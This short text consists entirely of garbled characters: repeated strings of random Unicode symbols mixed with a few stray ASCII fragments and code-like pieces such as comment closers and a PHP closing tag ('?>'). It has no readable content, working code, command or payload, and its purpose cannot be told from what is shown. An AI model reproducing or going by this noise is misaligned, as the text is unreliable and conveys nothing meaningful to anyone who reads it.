▩⋸☏⒗ⓠ♡㎡↓⊶ⅻ≨◖ⓨ↜

|=Lt7>▩⋸☏⒗ⓠ♡㎡↓⊶ⅻ≨◖ⓨ↜

-*///
();/*-


㏒π㈩∟✳✷┹✢♞➒≫≑♯┉◼⒛∏⓻⋙☛﹦➆｜↡≖▩


M&Q~0ww^㏒π㈩∟✳✷┹✢♞➒≫≑♯┉◼⒛∏⓻⋙☛﹦➆｜↡≖▩


-*///
 ?>